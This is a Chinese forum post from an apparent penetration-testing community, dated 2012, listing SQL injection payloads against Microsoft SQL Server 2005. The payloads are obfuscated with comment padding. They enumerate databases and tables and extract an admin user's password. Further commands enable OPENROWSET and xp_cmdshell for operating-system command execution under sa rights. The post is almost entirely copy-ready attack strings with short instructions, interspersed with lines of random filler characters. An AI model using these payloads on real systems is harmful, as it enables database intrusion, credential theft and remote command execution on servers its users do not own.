中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
8 ]5 {3 T P/ K* K7 X4 r0 J4 v3 X
' j- j. M& n7 Y9 O4 N3 x
9 D% N6 k1 u6 y g- \( f
[Copy to clipboard]CODE:
/ J$ U8 H" ~# P0 n% L/ n
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
! I* u' R: y' u0 `% w- F% N
7 _7 T' {3 ?5 c% C: m ~
爆表语句,somedb部份是所要列的数据库,红色数字1累加
1 A) Q# |8 a2 ?, l! D% H
8 \ p2 v1 i; @% I) g l, e
* C, G; q, b2 a
[Copy to clipboard]CODE:
+ M' y) s- x; B: X
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
: I: i/ Y* a. x9 L( K
% m8 e* W4 D' S* G; r; m( w
爆字段语句,爆表admin里user='icerover'的密码段
2 h; o+ T0 P( } [1 e' ^% i4 h* Y
. i$ S9 y+ V3 q5 ^# b# A5 n; w) P
; s" e5 `2 D q* U
[Copy to clipboard]CODE:
% q1 t" ~; R) _/ o6 Z
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
2 ]8 ?5 K1 m4 }' f
7 c) y7 R' u" `- {" w7 r0 z) }
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
) @3 F9 O5 @ s. c* M
如果是sa权限,可以这样来开启
# E. H! {6 A- |% E6 l
开启openrowset
# j; n3 G2 [$ C6 h
& Z9 r9 z. l5 k. h% r: T
" M/ {) N) L% L2 q& f( D# F. b
[Copy to clipboard]CODE:
/ h3 S T' ?' L$ _* u; M
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
1 o6 \4 z' l; A' |8 z
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
# P+ _/ g) x0 J7 h) I' `! h+ H
- ]2 {( I' b# Z) n) }. C5 R' S9 n, Z
开启xp_cmdshell
; e+ b8 Q, r0 ` i/ C1 J' Y* p- _
8 G. ~( z# X9 }
$ J7 F4 e3 ~9 m3 `7 k6 o
[Copy to clipboard]CODE:
+ i- v2 D# c5 \
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
; d9 c- h0 g$ @$ V
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
# h9 O* ~/ ^. i# D1 E- ^% F' Z
$ {* i% I3 \& z, o3 Z
ok,over~~晚安
1 R D' X# g; P+ o7 o
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2